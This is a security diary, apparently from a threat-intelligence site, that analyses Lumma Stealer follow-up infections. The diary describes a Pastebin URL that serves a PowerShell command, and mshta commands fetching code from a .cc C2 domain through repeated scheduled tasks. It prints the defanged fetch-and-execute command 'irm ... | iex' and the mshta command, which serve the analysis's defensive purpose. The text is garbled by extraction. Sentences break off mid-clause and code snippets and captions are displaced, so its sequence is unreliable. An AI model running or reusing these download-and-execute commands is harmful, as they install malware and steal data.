Introduction<\/strong><\/em><\/p>\n In recent weeks, Lumma Stealer infections have followed a specific pattern in follow-up activity. This pattern adds scheduled tasks for the same action, which increases traffic to the same C2 domain. This diary documents an example from one of these infections on January 14, 2026.<\/p>\n Details<\/strong><\/em><\/p>\n After Lumma Stealer performs its data exfiltration, the infected Windows host retrieves information from a Pastebin link, which the infected host uses for a follow-up infection. So far, this follow-up infection has used The image below shows an example of a Lumma Stealer infection from today.<\/p>\n The follow-up infection from Lumma Stealer activity begins with a Pastebin URL, which is The Pastebin URL returns the following PowerShell command:<\/p>\n This leads to several follow-up HTTPS requests for This activity appears to build on itself. Almost 11 hours after an initial infection, the infected Windows host in my lab had 31 scheduled tasks with different names, but they all had the same trigger and action: running the This generated more C2 traffic to .cc<\/code><\/span> domains for its C2 traffic. Here is one such example<\/a> from the beginning of January 2026.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/isc.sans.edu\/diaryimages\/images\/2026-01-14-ISC-diary-image-01.jpg?ssl=1\")
<\/a>
\nShown above: Traffic from a Lumma Stealer infection today filtered in Wireshark.<\/em><\/p>\nhxxps[:]\/\/pastebin[.]com\/raw\/xRmmdinT<\/span><\/code> seen as recently today, as January 14, 2026.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/isc.sans.edu\/diaryimages\/images\/2026-01-14-ISC-diary-image-02.jpg?ssl=1\")
<\/a>
\nShown above: Pastebin URL used for the follow-up infection shown in a web browser.<\/em><\/p>\nirm hxxps[:]\/\/fileless-market[.]cc\/Notes.pdf | iex<\/code><\/span><\/p>\nhxxps[:]\/\/fileless-market[.]cc\/<\/code><\/span> as time progresses. These HTTPS requests are caused by commands for mshta hxxps[:]\/\/fileless-market[.]cc\/<\/code><\/span> that in turn generate a scheduled task to perform the same command.<\/p>\nmshta<\/code><\/span> command for hxxps[:]\/\/fileless-market[.]cc\/<\/code><\/span>.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/isc.sans.edu\/diaryimages\/images\/2026-01-14-ISC-diary-image-03.jpg?ssl=1\")
<\/a>
\nShown above: Task scheduler for the infected Windows host showing multiple tasks generated by this infection after several hours.<\/em><\/p>\nfileless-market[.]cc<\/code><\/span> as the hours passed. On January 14, 2026 at 16:02 UTC, I saw 33 TCP streams for HTTPS sessions to this C2 server.<\/p>\n
![\"\"](\"https:\/\/i0.wp.com\/isc.sans.edu\/diaryimages\/images\/2026-01-14-ISC-diary-image-04.jpg?ssl=1\")
<\/a>